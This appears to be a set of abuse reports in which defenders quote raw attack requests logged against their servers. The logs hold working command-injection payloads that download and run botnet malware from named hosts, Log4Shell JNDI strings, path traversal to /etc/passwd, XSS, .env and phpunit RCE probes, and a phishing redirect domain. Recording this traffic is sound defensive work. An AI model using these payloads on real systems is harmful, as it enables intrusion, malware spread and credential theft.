Phishing attempt via SVG file - Microsoft credentials theft attempt.
SVG file contains JS that redirects to https://files.docservercredentiials.com/${UNIQUELINK}?e={trackerValue}

Large volume of requests against specific product APIs (not general technology - but company / product oriented).
Heavy scraping of resources.

Attacks against our APIs incoming from this address detected. Automated tools like sqlmap or Burp active scan were used.

pma discovery and setup scripts + WordPress related payloads on non WordPress non pma site
GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
GET /program/index.php?lang=en HTTP/1.1
GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
GET /phpMyAdmin-5.2.0/index.php?lang=en HTTP/1.1
GET /db/db-admin/index.php?lang=en HTTP/1.1

Java related payloads (log4shell) & auth bypass exploits
POST /j_security_check HTTP/1.1
GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1
GET / HTTP/1.1
POST /graphql HTTP/1.1
POST /mifs/j_spring_security_check HTTP/1.1
POST /suite-api/api/auth/token/acquire HTTP/1.1
POST /api/login HTTP/1.1
GET /webtools/control/main HTTP/1.1
POST /hybridity/api/sessions HTTP/1.1
GET /portal/info.jsp HTTP/1.1
POST /ui/login.action HTTP/1.1
POST /api/system/sessions HTTP/1.1
POST /ccmadmin/j_security_check HTTP/1.1
POST /suite-auth/login HTTP/1.1
GET /websso/SAML2/SSO/vsphere.local?SAMLRequest HTTP/1.1
POST /zdm/cxf/login HTTP/1.1
GET /goanywhere/auth/Login.xhtml HTTP/1.1
POST /opennms/j_spring_security_check HTTP/1.1
POST /login HTTP/1.1
GET /c42api/v3/LoginConfiguration?url=https://localhost&username=${jndi:ldap://${hostName}.cgaug35brjf549vj0tjg4x7qqrw1p87ca.oast.online/test} HTTP/1.1
...

Mozi malware spread
27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0

Already for a few days automated attacks are incoming against our services from this address
few examples
GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_multiroot HTTP/1.1
GET /img.php?f=/./etc/./passwd HTTP/1.1
GET /help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1

GET /shell?cd+/tmp;rm+-rf+arm7;wget+http:/x5C/45.95.55.157/bins/arm7;chmod+777+arm7;./arm7 selfrep.jaws
GET /backupmgt/localJob.php?session=fail`wget%20-O-%20http%3A%2F%2F45.95.55.157%2Fseagate.sh%7Csh` HTTP/1.0
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/wget.sh;wget+http://45.95.55.157/wget.sh+-O+/tmp/wget.sh;sh+/tmp/wget.sh+selfrep.netgear&curpath=/&currentsetting.htm=1 HTTP/1.1
GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bwget%20http%3A%2F%2F45.95.55.157%2Fzyxel.sh%20-O%20-%20%7C%20sh%20%23+%23&password=asdf HTTP/1.1
GET /setup.cgi?next_file=afr.cfg&todo=syscmd&cmd=wget%20http://45.95.55.157/bins/mips%20-O%20/var/tmp/mips;%20chmod%20777%20/var/tmp/mips;%20/var/tmp/mips%20selfrep.africo;%20rm%20-rf%20/var/tmp/mips&curpath=/&currentsetting.htm=1 HTTP/1.1
GET /index.php?s=/index/x09hinkx07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://45.95.55.157/bins/x86 -O /tmp/.th; chmod 777 /tmp/.th; /tmp/.th selfrep.thinkphp

GET /cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS}http://vzwebsite.ir/fuez/potar.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}Alcatel; HTTP/1.1

GET /.env HTTP/1.1
GET /_profiler/phpinfo HTTP/1.1
GET /phpinfo.php HTTP/1.1
GET /phpinfo HTTP/1.1

GET /cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS}http://vzwebsite.ir/fuez/potar.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}Alcatel; HTTP/1.1

GET /api/.env HTTP/1.1
GET /.env HTTP/1.1
GET /.env.example HTTP/1.1
GET /server/.env HTTP/1.1
GET /_profiler/phpinfo HTTP/1.1
GET /.env.local HTTP/1.1
GET /laravel/.env HTTP/1.1

GET /phpinfo/info.php HTTP/1.1
GET /phpinfo.html HTTP/1.1
GET /_profiler/phpinfo/phpinfo.php HTTP/1.1
GET /phpinfo.txt HTTP/1.1
GET /_profiler/phpinfo/info.php HTTP/1.1
GET /phpcustom_info/phpinfo.php HTTP/1.1
GET /php52/phpinfo.php HTTP/1.1
GET /apache/phpinfo.php HTTP/1.1
GET /phpinfo1.php HTTP/1.1
GET /phpinfo3.php HTTP/1.1

GET /.env HTTP/1.1
GET //vendor/.env HTTP/1.1
GET //lib/.env HTTP/1.1
GET //lab/.env HTTP/1.1
POST //panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
POST //phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
POST //phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
etc..

POST //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
POST //vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
GET //v1/.env HTTP/1.1
GET //tools/.env HTTP/1.1
GET //v2/.env HTTP/1.1
GET //laravel/.env HTTP/1.1
GET //administrator/.env HTTP/1.1
etc...